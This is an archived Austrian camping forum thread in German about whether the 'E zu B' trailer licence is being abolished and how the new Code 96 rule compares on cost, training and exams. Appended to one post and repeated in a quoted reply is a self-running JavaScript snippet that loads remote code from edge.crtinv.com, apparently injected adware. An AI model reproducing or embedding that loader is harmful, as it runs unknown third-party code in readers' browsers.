PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : E zu B wird abgeschafft?



schlecksi77
23.06.2012, 08:53
Hallo erstmal

Habe diese Woche schon des öfteren gehört, dass der EzuB abgeschafft wird, und das Gesamtgewicht dafür auf 4250kg erhöht wird, dafür muss man dann anscheinend einen abgestuften C mit Auflagen zum Hänger machen, wenn man über dioe 4250kg kommt.

Ich weiss das Thema EzuB ist schon ein alter Hut.Aber bei unseren Fahrschulen sind die Kurse EzuB zurzeit ausgebucht. Oder ist das ein Gerücht und somit eine Umsatzankurbelungsaktion?

Ich brauche den EzuB zwar nicht, aber wenn das stimmt, würde ich ihn noch machen.

lg Martin

johannsen
23.06.2012, 09:19
Hallo erstmal

Habe diese Woche schon des öfteren gehört, dass der EzuB abgeschafft wird, und das Gesamtgewicht dafür auf 4250kg erhöht wird, dafür muss man dann anscheinend einen abgestuften C mit Auflagen zum Hänger machen, wenn man über dioe 4250kg kommt.



Hallo Martin!

Dass er abgeschafft wird, ist Unsinn. Was aber stimmt ist, dass er für einige Gespannfahrer überflüssig werden wird.

Konkret sieht es so aus, dass ab 19.1.2013 ein schwerer Anhänger dann mit B alleine gezogen werden darf, wenn die Summe der höchstzulässigen Gesamtgewichte von Zugfahrzeug und Anhänger höchstens 4250 kg beträgt UND (!!!!!) der Inhaber des FS eine Schulung im Ausmaß von 7 Stunden (schlag mich nicht, wenns jetzt nur fünf sind) absolviert hat.

Kosten sollen/müssen wohl unter EzB liegen, wobei ich persönlich jedem nur empfehlen tät, ihn trotzdem zu machen, weil die praktischen Tipps bei der EzB Ausbildung schon sehr gut sind.

LG

campingfamily
23.06.2012, 09:24
E zu B bleibt selbstverständlich!


Wie Johannsen schon geschrieben hat.


Weiters soll die derzeitige Einschränkung fallen, dass das Eigengewicht des Zugfahrzeuges > / = zGG Wowa sein muß. Allein das bringt sicher einigen was.


Bevor ich diese Schulung dieses neuen B 96 mache, würd ich allerdings gleich EzuB machen.

johannsen
23.06.2012, 09:27
Bevor ich diese Schulung dieses neuen B 96 mache, würd ich allerdings gleich EzuB machen.

Genau, die EzB Prüfung ist nämlich wirklich ein Klacks, weil man ja nur die anhängerrelevanten Bestimmungen lernen muss. Die ist in höchstens 10 Minuten erledigt ;-)

Auf die paar Euro mehr kommts bei unserem Hobby auch nicht an, denk ich.

LG

Fasti24
23.06.2012, 11:03
Hallo erstmal
Also unser Gespann (Chrysler Voyayager und Adria Wohnwagen) hat zusammen ein HZzg von 3650kg.
Ich besitze den E zu B nur meine Frau nicht. Sind am überlegen ob sie den E zu B machen soll oder so wie ich das verstehe wäre das ganze hinfällig wenn sie nächstes Jahr die Schulung macht damit sie bis HZzg 4250kg fahren darf.
Weiß schon wer auf was für kosten sich diese Schulung belaufen wird?

MfG Sigi

grisu
23.06.2012, 11:29
Bevor ich diese Schulung dieses neuen B 96 mache, würd ich allerdings gleich EzuB machen.

Ich sehe das genau so wie Johannsen und campingfamily.
Der Kurs in der Fahrschule und auch die Prüfung selbst sind relativ einfach und man erhält solide Infos und Tipps.

Da der "echte" EzuB Führerschein ja "nur" ca. 250 - 300 Euro kostet,
dürften die Kosten für die vorgeschrieben sieben Schulungsfahrten bei der neuen Regelung (B + Code 96) wohl auch nicht viel günstiger sein.
Also der Preis kanns da wohl eher auch nicht sein, nur die Prüfung selbst fällt da halt weg.

Wenn man z.B. etwas "Prüfungsängstlich" ist und es nur um geringe Gewichtsdifferenzen geht, dann wärs eventuell das Richtige. ;)

abo
23.06.2012, 11:59
Weiß schon wer auf was für kosten sich diese Schulung belaufen wird?
MfG Sigi


hi

ich denke mal der code 96 wird sich auf das selbe niveau einpendeln wie der dzt code 111 (lenkberechtigung fuer 125ccm3 motorrad nur mit B)
genau genommen sollte er sogar drunter liegen denn bei den motorradschulungen wird sicher oefter was hin wie beim rumfahren mit einem anhaneger

die meinige hat den code 111 neulich gemacht
in wien
war ein lustiger nachmittag am parkplatz sagt sie
code 111 hat gekostet 120,-

lg
g

schlecksi77
23.06.2012, 12:29
Danke erstmal

Also hab ich fürn EzuB noch ein wenig Zeit:)

lg martin

vielis
23.06.2012, 18:46
die 7 stunden teilen sich in theorie und praxis ....

ich erwarte mir bei der code 96 schulung die selben tipps zu bekommen wie bei einem ezub kurs!;):rolleyes::cool:

da es bei meinem gespann nur um 45 kg geht erspar ich mir die pruefung ......

auch bei einer neuanschaffung von auto oder wowa braucht man dann nimmer sooo aufpassen ....

Ingrid1
23.06.2012, 20:46
Meine Tochter musste E zu B schon vor Jahren machen, denn sie fährt mit dem Pferdeanhänger, oft mit 2 Pferden und da überschreitet sie das Gewicht bei Weitem. Sie fand ihn leicht und man lernt schliesslich auch noch dazu.
Nach der Pferdemesse damals in Wiener Neustadt hat die Polizei nachher bei den Kontrollen ziemlich einige Besitzer mit beladenen Pferdeanhängern abstellen lassen, weil eben E zu B nicht vorhanden war.

Wir mit unserem Hänger samt Quad überschreiten das Gesamtgewicht nicht, also haben wir uns das erpart. Die Tochter hat allerdings das Pferd mit unserem Camper schon transportiert, eben weil sie E zu B hatte.

rotti
24.06.2012, 08:48
HI Freunde!

Irgendwie tut mir bei solchen Diskussionen das Herz weh. Ist ja fast schon wie: Ich nehme nur die halbe Antibabypille weil so fest schlafen wir ja auch nicht miteinander:D:D
Wegen ein paar Stunden Mehraufwand und a bissal mehr Kohle mach ich doch gleich den E zu B .......
Und irgendwann häng ich mal was an wo der Kleine Fetzten dann wieder nicht passt. Einen schönen Sonntag noch!

LG
Mathias

gary
24.06.2012, 08:54
HI Freunde!

Irgendwie tut mir bei solchen Diskussionen das Herz weh. Ist ja fast schon wie: Ich nehme nur die halbe Antibabypille weil so fest schlafen wir ja auch nicht miteinander:D:D
Wegen ein paar Stunden Mehraufwand und a bissal mehr Kohle mach ich doch gleich den E zu B .......
Und irgendwann häng ich mal was an wo der Kleine Fetzten dann wieder nicht passt. Einen schönen Sonntag noch!

LG
Mathias

den vergleich mit der pille kann ich da nicht nachvollziehen.
entweder ich brauch ihn, dann mach ich ihn. oder ich brauch ihn nicht,
dann mach ich ihn auch nicht.

rotti
24.06.2012, 09:21
den vergleich mit der pille kann ich da nicht nachvollziehen.
entweder ich brauch ihn, dann mach ich ihn. oder ich brauch ihn nicht,
dann mach ich ihn auch nicht.



Genau so ist es !:p

abo
24.06.2012, 13:54
Wegen ein paar Stunden Mehraufwand und a bissal mehr Kohle mach ich doch gleich den E zu B .......



hi

versteh ich ned
wer sagt denn dass du beim E zu B mehr lernst ?

das kommt doch immer auf den fahrlehrer an

mit einem gscheiten fahrlehrer der sich auskennt lernst in 5 stunden am parkplatz dreimal mehr als an vier theorieabenden beim E zu B

grad in DER branche gibt es da ja die unterschiedlichsten niveaus

wenn ich da an die fahrschule meiner tochter denke (sie hat den L17 jetzt uebrigens kuerzlich auf den ersten anlauf bestanden ..) wird mir jetzt noch uebel

"ausbildungs-fahrschullehrer" die
- den fahrschuelern mit inbrunst deutsche verkehrsregeln vorbeten... wenn sie den bloedsinn bei der prufeung ankreuzt oder so faehrt faellt sie auf anhieb durch.
- auch bei der zehnten stunde noch den erstbesten weg raus aus der stadt fahren lassen, weil "innerstaedtisch ist es immer so stressig. nachdem meine tochter das siebte mal als "fahrstunde" gleich von der fahrschule weg in st marx rauf die autobahn bis fischamend und wieder retour fahren musste hab ich mal gefragt was der bloedsinn eigentlich soll ...

habe dasselbe jetzt schon von so vielen eltern gehoert die ihre kids grad in der fahrschule haben ...ueberall das selbe ...
an "unterricht" ist da kaum wer interessiert

ich kenn mich ned genau aus aber es muss da irgendwelche ausnahmeregelungen geben fuer fahrlehrer in ausbildung
denn es scheint an vielen fahrschulen das gleiche zu sein
die sind da immer nur ca 3 monate beschaeftigt und sind keine ausgeblideten fahrlehrer, fahren aber trotzdem (alleine) mit den fahrschuelern mit den autos ...
das scheint irgendwie moeglich zu sein

und detto beim E zu B
kann ja eh sein das man einen prima fahrlehrer bekommt der die noetige erfahrung hat und der einem gute tipps geben kann.

genauso ist es moeglich dass das ein vogel ist der selber noch nie mit einem WoWa gefahren ist und der nur den text runterbetet ...

DAFUER muss ich dann aber ned 300,- mehr zahlen und mehr zeit vertroedeln als unbedingt sein muss ....

PS:
bei meiner tochter und meiner frau wird es wohl auch der code 96 werden (ich selber hab ja eh alle A, B, C, E, F , G , den ganzen kram halt ..)
dann geht sich das beim fahren mit dem schweren haenger prima aus
dzt zugfahrzeug HZLGG 2050, anzuschaffendes zugfahrzeug (ein vito) 3200kg HZLGG
HZLGG scherer haenger 1050kg bis 1300kg
somit kann ich den schweren haenger am dzt zugfahrzeug ohne zusatzpruefung fahren lassen und am neuen zugfahrzeug typisiere ich ihn wenn die maedls fahren auf 1050kg runter und es passt auch wieder ...


lg
g

johannsen
24.06.2012, 15:22
mit einem gscheiten fahrlehrer der sich auskennt lernst in 5 stunden am parkplatz dreimal mehr als an vier theorieabenden beim E zu B


Hallo Gerhard!

Das Problem dürfte aber sein, dass es beim "neuen" B nur eine theoretische Ausbildung gibt, also nix mit "fünf Stunden am Parkplatz"! So hab ich die Reformregelung gelesen - gebe aber zu, dass ich noch keine fertige Durchführungsverordnung kenne.

Für mich sieht es eher nach EzB ohne Fahrpraxis aus.

LG

Johann

46erkurt
25.06.2012, 09:07
Code 111 wir im Ausland (bis auf wenige Ausnahmen) nicht anerkannt. Ich nehme mal an das es so auch beim Code 96 sein wird.

seiwer
25.06.2012, 09:27
Bei E zu B kannst du theoretisch bis zu 7 Tonnen fahren; d.-h. das Auto hat 3,5 und der Anhänger auch (aber alle anderen Bestimmungen müssen auch stimmen)
Die Ausbildung ist sehr einfach; es gibt ein Skriptum mit ca. 50 Fragen, die mit zweimal durchlesen erledigt sind.
Wenn Dein Führerschein schon vor Jahrzehnten gemacht wurde, dann ist ein Erste-Hilfe-Nachweis erforderlich; d.h. ab zum Roten Kreuz und am Samstag Vormittag einen Kurs machen (schadet absolut nicht und ist sehr lehrreich).
Die Prüfungsfragen sind dann per Computer zu erledigen und die Frage entsprechen dem Skriptum.
Die Fahrpraxis ist auch kein Problem, wenn Du schon mit dem WoWa gefahren bist. Bei der Prüfung hängt ein kleinerer Anhänger hinten dran; ein oder zwei Fahrstunden sollte man schon opfern - man lernt immer wieder etwas.
LG Werner

derfranze
25.06.2012, 09:27
Code 111 wir im Ausland (bis auf wenige Ausnahmen) nicht anerkannt. Ich nehme mal an das es so auch beim Code 96 sein wird.


Nein. Der Code 96 ist in der EU-FS Verordnung drinnen sowie der M und die 3 Motorradführerscheine. Code 111, Mopedlenkerausweis und FS Gruppe "F" sind nationale Codes bzw. Führerscheine und gelten nur im Inland.

lg Franz

schlesi66
25.06.2012, 10:32
Bei E zu B kannst du theoretisch bis zu 7 Tonnen fahren; d.-h. das Auto hat 3,5 und der Anhänger auch (aber alle anderen Bestimmungen müssen auch stimmen)

LG Werner

Hallo Werner.
Das ist nicht ganz richtig.
Bis zu 7 tonnen betrifft nur einen auflaufgebremsten Anhänger - der darf max.3500kg Gesamtgewicht haben.
Hättest jetzt einen druckluftgebremsten Anhänger, darf der auch schwerer sein. Dann richtet sich das Gewicht nach der Zugmaschiene. Ich denke - nur eine Vermutung von mir - daß somit das theoretische Gesamtgewicht bei ca. 8 bis 8,5 tonnen sein wird.

Mit E zu B darfst ja auch einen Sattelaufleger fahren, wenn das Zugfahrzeug 3,5 tonnen hat.;)

Wienerwald-Jo
25.06.2012, 10:34
Bei E zu B kannst du theoretisch bis zu 7 Tonnen fahren; d.-h. das Auto hat 3,5 und der Anhänger auch (aber alle anderen Bestimmungen müssen auch stimmen)
Die Ausbildung ist sehr einfach; es gibt ein Skriptum mit ca. 50 Fragen, die mit zweimal durchlesen erledigt sind.
Wenn Dein Führerschein schon vor Jahrzehnten gemacht wurde, dann ist ein Erste-Hilfe-Nachweis erforderlich; d.h. ab zum Roten Kreuz und am Samstag Vormittag einen Kurs machen (schadet absolut nicht und ist sehr lehrreich).
Die Prüfungsfragen sind dann per Computer zu erledigen und die Frage entsprechen dem Skriptum.
Die Fahrpraxis ist auch kein Problem, wenn Du schon mit dem WoWa gefahren bist. Bei der Prüfung hängt ein kleinerer Anhänger hinten dran; ein oder zwei Fahrstunden sollte man schon opfern - man lernt immer wieder etwas.
LG Werner

E zu B habe ich vor ca.15Jahren gemacht, da war der Amtsarzt auch dabei(mit vollem Programm wie Seh/Hörtest/Blutdruck/Zucker usw.)das war eine unangenehme Überraschung:eek:
Zwar war alles O.K., aber heute als gebrechliches Männchen???;););)
Die Prüfung selbst war ein Klacks:cool:
JO

campingfamily
25.06.2012, 12:21
E zu B habe ich vor ca.15Jahren gemacht, da war der Amtsarzt auch dabei(mit vollem Programm wie Seh/Hörtest/Blutdruck/Zucker usw.)das war eine unangenehme Überraschung:eek:
Zwar war alles O.K., aber heute als gebrechliches Männchen???;););)
Die Prüfung selbst war ein Klacks:cool:
JO


Ich war nicht beim Amtsarzt, sondern konnte mir aus einer riesigen Liste einen Arzt raussuchen, bei dem ich noch nicht war.

Dort gab es einen Sehtest und Blutdruckmessen. Ein paar Fragen beantworten. Finito. Da weiß ich nicht, wo das Problem ist. Wenn es mit den Augen nicht mehr so gut klappt, sollte man tunlichst auch ohne Anhänger eine Brille überdenken;)

Und die "Prüfung" besteht aus einem fünf minütigen Kreuzerltest am Computer - die Fragen sind die gleichen wie in den Unterlagen und du kannst die Prüfung zur Probe so oft du willst simulieren. Nach ein paar Simulationsvorgängen sollten dem untalentiertesten Zeitgenossen diese 70 Fragen (wovon ein Großteil so selbsterklärend ist, dass du bei Nichtwissen eh nix auf der Straße zu suchen hast;)) aus den Ohrwascherln rausrauchen.

Wienerwald-Jo
25.06.2012, 13:36
Ich war nicht beim Amtsarzt, sondern konnte mir aus einer riesigen Liste einen Arzt raussuchen, bei dem ich noch nicht war.

Dort gab es einen Sehtest und Blutdruckmessen. Ein paar Fragen beantworten. Finito. Da weiß ich nicht, wo das Problem ist. Wenn es mit den Augen nicht mehr so gut klappt, sollte man tunlichst auch ohne Anhänger eine Brille überdenken;)

Und die "Prüfung" besteht aus einem fünf minütigen Kreuzerltest am Computer - die Fragen sind die gleichen wie in den Unterlagen und du kannst die Prüfung zur Probe so oft du willst simulieren. Nach ein paar Simulationsvorgängen sollten dem untalentiertesten Zeitgenossen diese 70 Fragen (wovon ein Großteil so selbsterklärend ist, dass du bei Nichtwissen eh nix auf der Straße zu suchen hast;)) aus den Ohrwascherln rausrauchen.

:rolleyes: nix "Kreuzerltest"am Computer
war aber auch im vorigen Jahrtausend;)
schwer war`s trotzdem nicht

abo
25.06.2012, 17:50
Hallo Werner.
Das ist nicht ganz richtig.
Bis zu 7 tonnen betrifft nur einen auflaufgebremsten Anhänger - der darf max.3500kg Gesamtgewicht haben.
Hättest jetzt einen druckluftgebremsten Anhänger, darf der auch schwerer sein. Dann richtet sich das Gewicht nach der Zugmaschiene. Ich denke - nur eine Vermutung von mir - daß somit das theoretische Gesamtgewicht bei ca. 8 bis 8,5 tonnen sein wird.
Mit E zu B darfst ja auch einen Sattelaufleger fahren, wenn das Zugfahrzeug 3,5 tonnen hat.;)

hi

genau das wird aber glaub ich mit der FS-richtline repariert
da kommt rueckwirkend irgendeine begrenzung soweit ich weiss ...

lg
g

router1981
25.06.2012, 22:43
hallo,
ich hab auch aufgrund eines Autokaufs vor einem Monat jetzt E zu B gemacht.
Arzt war eine 3 Minuten Aktion, komplett oberflächliche Untersuchung.
Den theorethischen Kurs hab ich generell interessant und hilfreich empfunden. Die theorethische Prüfung wurde in 1:50 Minuten geschafft. 20 Fragen - ohne Probleme.

Gesamtkosten inkl. aller Abgaben und Gebühren 450,-

Lg aus Kärnten

Zwergerl27
19.09.2012, 11:30
[quote=johannsen;176218]Hallo Martin!

Dass er abgeschafft wird, ist Unsinn. Was aber stimmt ist, dass er für einige Gespannfahrer überflüssig werden wird.

Konkret sieht es so aus, dass ab 19.1.2013 ein schwerer Anhänger dann mit B alleine gezogen werden darf, wenn die Summe der höchstzulässigen Gesamtgewichte von Zugfahrzeug und Anhänger höchstens 4250 kg beträgt UND (!!!!!) der Inhaber des FS eine Schulung im Ausmaß von 7 Stunden (schlag mich nicht, wenns jetzt nur fünf sind) absolviert hat.

Kosten sollen/müssen wohl unter EzB liegen, wobei ich persönlich jedem nur empfehlen tät, ihn trotzdem zu machen, weil die praktischen Tipps bei der EzB Ausbildung schon sehr gut sind.

Zwergerl27
19.09.2012, 11:32
Da kann ich dir nur recht geben, habe erst seit Kurzem einen Wohnwagen, dessen Gesamtgewicht (WW+Zugfahrzeug) an der erlaubten Grenze ist. Mir wurde bei der KFZ-Prüfstelle der Ld.-regierung dringendst empfohlen, zur eigenen Sicherheit E zu B zu machen, denn in der FS lernen die einem die Raffinessen beim Fahren mit so einem "Schleppverband" - meiner hat 13 m). Un da gehts ja nicht um ein paar Gesetzesänderungen hin und her, sondern um die eigene Sicherheit und Gesundheit. Kanns nur jedem anraten.
LG[/quote]

abo
19.09.2012, 12:08
....Mir wurde bei der KFZ-Prüfstelle der Ld.-regierung dringendst empfohlen, zur eigenen Sicherheit E zu B zu machen, denn in der FS lernen die einem die Raffinessen beim Fahren mit so einem "Schleppverband" - meiner hat 13 m). ....

hallo

kann ja eh jeder machen

meine tochter macht den E zu B evt ja auch noch weil sie irgendwie grad am fuehrerschein-trip ist
und solange pappi und mammi noch alles zahlt ...

naja

aber die KFZ pruefstelle hat - nomen est omen - nix mit fuehrerscheinen zu tun
dort sitzen techniker die beurteilen wollen (manchmal auch koennen) wie der technische zustand eines fahrzeuges ist

und was du in der fahrschule gelernt bekommst haengt von deinem fahrlehrer ab

von einer person also die - unter bestimmten bedingungen - nach wie vor KEINE BESONDERE AUSBILDUNG (ausser einem kurzen crash-kurs) nachweisen muss

das wird aber mit der fuehrerscheinnovelle geaendert

ab dann sollen nach einer uebergangsfrist auch fahrlehrer zur aus- und weiterbildung verpflichtet sein, und nicht nur wie bisher die staatlich geprueften fahrschullehrer ...

aber wie gesagt
kann eh jeder machen an kursen was er will ...

aber warum der herr fahrlehrer in den vier theorie-einheiten zu 45min theoriekurs und zwei fahrstunden-einheiten zu 45min die der E zu B dauert dem fahrschuler MEHR unterweisung geben und tricks beibringen sollte als wenn man beim code 111 in zukunft 5 stunden PRAKTISCH mit dem haenger faehrt und uebt dass erschliesst sich mir ned wirklich ..

man braucht sich es ja nur mal ansehen und aufschreiben

E zu B
2 einheiten praxis
4 einheiten theorie
pruefung muss abgelegt werden
aerztliches gutachten noetig
fuehrerschein muss neu ausgestellt werden (kostet a lawine)
kurs ist teurer

code 111:
kurs ist billiger
5 einheiten praxis
keine pruefung
kein aerztliches gutachten
keine fuehrerschein neuausstellung (beiblatt genuegt)

also wenn ich mit 4250kg zugsgesamtgewicht auskommen wuerde ... mir waere klar was ich mache

lg
g

derfranze
19.09.2012, 13:04
Code 111 ist für die 125 Zweiräder mit 5 Jahren B-Schein Praxis. Code 96 ist für die 4250 Kg Gespanngewicht.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

Zwergerl27
19.09.2012, 15:04
hallo

kann ja eh jeder machen

meine tochter macht den E zu B evt ja auch noch weil sie irgendwie grad am fuehrerschein-trip ist
und solange pappi und mammi noch alles zahlt ...

naja

aber die KFZ pruefstelle hat - nomen est omen - nix mit fuehrerscheinen zu tun
dort sitzen techniker die beurteilen wollen (manchmal auch koennen) wie der technische zustand eines fahrzeuges ist

und was du in der fahrschule gelernt bekommst haengt von deinem fahrlehrer ab

von einer person also die - unter bestimmten bedingungen - nach wie vor KEINE BESONDERE AUSBILDUNG (ausser einem kurzen crash-kurs) nachweisen muss

das wird aber mit der fuehrerscheinnovelle geaendert

ab dann sollen nach einer uebergangsfrist auch fahrlehrer zur aus- und weiterbildung verpflichtet sein, und nicht nur wie bisher die staatlich geprueften fahrschullehrer ...

aber wie gesagt
kann eh jeder machen an kursen was er will ...

aber warum der herr fahrlehrer in den vier theorie-einheiten zu 45min theoriekurs und zwei fahrstunden-einheiten zu 45min die der E zu B dauert dem fahrschuler MEHR unterweisung geben und tricks beibringen sollte als wenn man beim code 111 in zukunft 5 stunden PRAKTISCH mit dem haenger faehrt und uebt dass erschliesst sich mir ned wirklich ..

man braucht sich es ja nur mal ansehen und aufschreiben

E zu B
2 einheiten praxis
4 einheiten theorie
pruefung muss abgelegt werden
aerztliches gutachten noetig
fuehrerschein muss neu ausgestellt werden (kostet a lawine)
kurs ist teurer

code 111:
kurs ist billiger
5 einheiten praxis
keine pruefung
kein aerztliches gutachten
keine fuehrerschein neuausstellung (beiblatt genuegt)

also wenn ich mit 4250kg zugsgesamtgewicht auskommen wuerde ... mir waere klar was ich mache

lg
g

Hallo,
wenn ich meinem FS-Zusatz so kurz blicke, bedeutet: code 111 Berechtigung zum Lenken von Krafträdern gemäß § 2 Abs. 1 Zeile 2 lit. c FSG - Lenken von 125-ccm-Motorrädern, hat denke ich mit Anhängern nicht wirklich was zu tun.

Aber ist nicht wirklich wichtig, nur eine Feststellung.

*gg*

Zwergerl27
19.09.2012, 15:07
Code 111 ist für die 125 Zweiräder mit 5 Jahren B-Schein Praxis. Code 96 ist für die 4250 Kg Gespanngewicht.

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

Da gebe ich dir recht, mein FS enthält auch den Code 111 - zur Berechtigung zum Lenken von Motorrädern bis 125 ccm, welche ich gerade für den Winter "einmotte"

FRAS1976
19.09.2012, 15:12
denn in der FS lernen die einem die Raffinessen beim Fahren mit so einem "Schleppverband" - meiner hat 13 m). Un da gehts ja nicht um ein paar Gesetzesänderungen hin und her, sondern um die eigene Sicherheit und Gesundheit. Kanns nur jedem anraten.
LG[/quote]
Hallo Zwergerl,

meine Erfahrung bei der E-B-"Ausbildung":
Gefahren sind wir im Kurs mit einem 170PS-Automatik VW Bus mit einem Hänger der kaum breiter war als der Bus und geschätzte 3m lang war (und unbeladen, d.h. NULL gewicht). Jeder ist so ca. 15min gefahren, der Rest war blabla, genauso bei der "Prüfung".
Ich fahre privat mit 120PS Handschalter und einem 7,5x2,5/1600kg WoWa.
Fazit: der Lerneffekt war gleich null, dafür bin ich seitdem legal unterwegs.
Mein Eindruck war das die E-B Prüfung "schimpansensicher" werden sollte, das Gespann war deppensicher und die Route auch (die paar Fragen sowieso).
Gekostet hat der Spass so ca. 350€ und zwei Nachmittage, von daher war der Aufwand überschaubar
Die Qualität der E-B Ausbildung hängt sicher von der Fahrschule/ vom Fahrlehrer ab.....aber erwarte Dir bitte keine Wunder. Mit Deinem "Schleppverband" lernst sicher nicht in der Fahrschule fahren.
lG. aus KO

Zwergerl27
19.09.2012, 15:35
Hallo Zwergerl,

meine Erfahrung bei der E-B-"Ausbildung":
Gefahren sind wir im Kurs mit einem 170PS-Automatik VW Bus mit einem Hänger der kaum breiter war als der Bus und geschätzte 3m lang war (und unbeladen, d.h. NULL gewicht). Jeder ist so ca. 15min gefahren, der Rest war blabla, genauso bei der "Prüfung".
Ich fahre privat mit 120PS Handschalter und einem 7,5x2,5/1600kg WoWa.
Fazit: der Lerneffekt war gleich null, dafür bin ich seitdem legal unterwegs.
Mein Eindruck war das die E-B Prüfung "schimpansensicher" werden sollte, das Gespann war deppensicher und die Route auch (die paar Fragen sowieso).
Gekostet hat der Spass so ca. 350€ und zwei Nachmittage, von daher war der Aufwand überschaubar
Die Qualität der E-B Ausbildung hängt sicher von der Fahrschule/ vom Fahrlehrer ab.....aber erwarte Dir bitte keine Wunder. Mit Deinem "Schleppverband" lernst sicher nicht in der Fahrschule fahren.
lG. aus KO[/quote]

Hallo,
danke, ist mir schon klar, dass in dieser kurzen Ausbildungsphase keine Wunder erwirkt werden - ist je bei jedem anderen Kurs auch so, denn Übung macht den Meister, aber wie du schon sagst, man ist legal und auf der sicheren gesetzlichen Seite. Meine Anmeldung zum E zu B bei meiner Fahrschule war auch gleich verbunden, mit der Bitte, zusätzliche Trainingseinheiten mit meinem Schleppverband (natürlich mit Aufpreis) zu vereinbaren. Ein sogenanntes Fahrsicherheitstraining, denn ich möchte keine Gefahr für den Verkehr darstellen *gggggg* und sicher am Ziel ankommen.:):):):):):):) lg vom Zwergerl

abo
19.09.2012, 19:21
Hallo,
wenn ich meinem FS-Zusatz so kurz blicke, bedeutet: code 111 Berechtigung zum Lenken von Krafträdern gemäß § 2 Abs. 1 Zeile 2 lit. c FSG - Lenken von 125-ccm-Motorrädern, hat denke ich mit Anhängern nicht wirklich was zu tun.



hallo

ja, danke
ich verwechsle die immer

111 ist die 125iger regelung
96 oder 99 wirdf die 4250kg fuer den haenger sein

ist aber beides "verwandt" miteinander

es gelten die selben regeln
- kein arzt
- keine pruefung
- keine getrennte theorie, nur praxis
- keine neuausstellung des FS noetig (nach der novelle)

lg
g

MANICHRU
19.09.2012, 22:44
Hallo

Bei meinem EzuB Kurs war die erste Frage des Fahrlehrers - wie lange fahren wir schon mit Anhänger???
Meine Antwort damals - 20 Jahre mit Anhänger / 5 Jahre mit Wohnwagen, alles unter 3500kg Hzg.
Was sollte der liebe Lehrer mir wirklich beibringen - der hatte ja sicher selbst weniger Erfahrung in Bezug auf WoWa Gespann.
Der Fahrlehrer gab mir damals keine `neuen Ratschäge`in Bezug auf EzuB.
Wichtig beim Gespannfahren ist sicher die Kombination (Gewicht) Zugfahrzeug / Wowa und die richtige Art der Beladung beider Fahrzeuge und die sichere Reisegeschwindigkeit.
Wenn sich Gewichte und Beladung in Grenzen halten ist das Reisen ein Vergnügen.

lg - manichru

FRAS1976
20.09.2012, 08:52
Meine Anmeldung zum E zu B bei meiner Fahrschule war auch gleich verbunden, mit der Bitte, zusätzliche Trainingseinheiten mit meinem Schleppverband (natürlich mit Aufpreis) zu vereinbaren. Ein sogenanntes Fahrsicherheitstraining, denn ich möchte keine Gefahr für den Verkehr darstellen *gggggg* und sicher am Ziel ankommen.:):):):):):):) lg vom Zwergerl

Das klingt ja sehr vernünftig wenn Du mit einem richtigen Gespann zuätzlich üben kannst.
@Manichru: stimmt wohl, die wenigsten Fahrleher haben Ahnung vom Wohnwagenfahren. Bei unserem E-B-Kurs war auch gleich eine der ersten Fragen: "seids eh alle Legalisierer, oder?" Für die Fahrschulen scheint E-B irgendwie eine Einnahmequelle zu sein, die versuchen da sicher den Aufwand möglichst gering zu halten (zumindest war das mein Eindruck).

lG.

abo
20.09.2012, 10:36
...
Wichtig beim Gespannfahren ist sicher die Kombination (Gewicht) Zugfahrzeug / Wowa und die richtige Art der Beladung beider Fahrzeuge und die sichere Reisegeschwindigkeit.
Wenn sich Gewichte und Beladung in Grenzen halten ist das Reisen ein Vergnügen.



hi

absolut
- tempo und
- art der gewichtsverteilung
ist das um und auf

ich mach da eh mal eine thread auf zu dem thema
hab zwar keine wowa aber doch sehr intensive anhaenger erfahrung
ich fahre ja alle 10 tage mit einem vollbeladenen 1300kg anhaenger am vollbeladenen zugfahrzeug quer durch oesterreich

und mein transportgut ist sehr unterschiedlich vom gewicht her aber immer klein und ich kann daher die gewichtsverteilung leicht variieren

es ist unglaublich wie sehr sich das fahrverhalten aendert wenn man zb
- die schweren sachen ganz vorne und ganz hinten im anhaenger platziert statt
- sie in der mitte ueber der achse zu platzieren

in beiden faellen gleiche deichsellast von ca 50kg

aber im
- ersten fall kommt der anhaenger teilweise schon bei ca tempo 80km/h leicht ins pendeln
- im zweiten fall kannst 100km/h und drueber fahren (wennst ned aufpasst) und da hinten tut sich garnix

eine frage der physik (traegheitsmomente) offenbar
aber faszinierend

lg
g

weissfranz
20.09.2012, 10:36
Nachdem ich den C und C1 Schein zurückgegeben habe (ich wollte, da schon über 60 nicht das Risiko der regelmäßigen Untersuchungen eingehen, wenns vieleicht Probleme gibt ist vielleicht auch der B weg) und Womo über 3,5t wegen GO Box usw. sowieso für mich wegfallen, dachte ich mir machst noch rechtzeitig E zu B, wer weiß wozu man ihn noch braucht....
Aufgrund der vielen Beiträge (ist eh nur ein Kinderspiel...) und der Aussagen des Fahrlehrers dachte ich ist alles keine Hexerei.
Aber da dürfte ich an den falschen sehr jungen Prüfer gekommen sein. Er nahm mich gleich als erster dran und prüfte mich gleich ziemlich gefinkelt Theorie. Na gut hab blöderweise bei einer Frage etwas mit ihm diskutiert (sollte man nicht tun, er hat natürlich recht).
Dann gings zum Fahrteil. Eine ganze (!) Stunde hat er mich durch die Pampa geschickt, dann gings auf den Übungsplatz mit verkehrt einparken in verschieden Variationen.
Ich war ganz schön fertig, der hat mir gezeigt wo der "Bartl den Most holt" (wie man in OÖ sagt)!
Kommt halt darauf an welchen Prüfer man bekommt, vieleicht sind sie auch bei Ältern auch etwas kritischer.

abo
20.09.2012, 12:43
....
Aufgrund der vielen Beiträge (ist eh nur ein Kinderspiel...) und der Aussagen des Fahrlehrers dachte ich ist alles keine Hexerei. Aber da dürfte ich an den falschen sehr jungen Prüfer gekommen sein. Er nahm mich gleich als erster dran und prüfte mich gleich ziemlich gefinkelt Theorie. Dann gings zum Fahrteil. Eine ganze (!) Stunde hat er mich durch die Pampa geschickt, dann gings auf den Übungsplatz mit verkehrt einparken in verschieden Variationen.
....

hallo

solche storys hab ich das eine oder andere mal auch schon gehoert
kommt halt immer drauf an

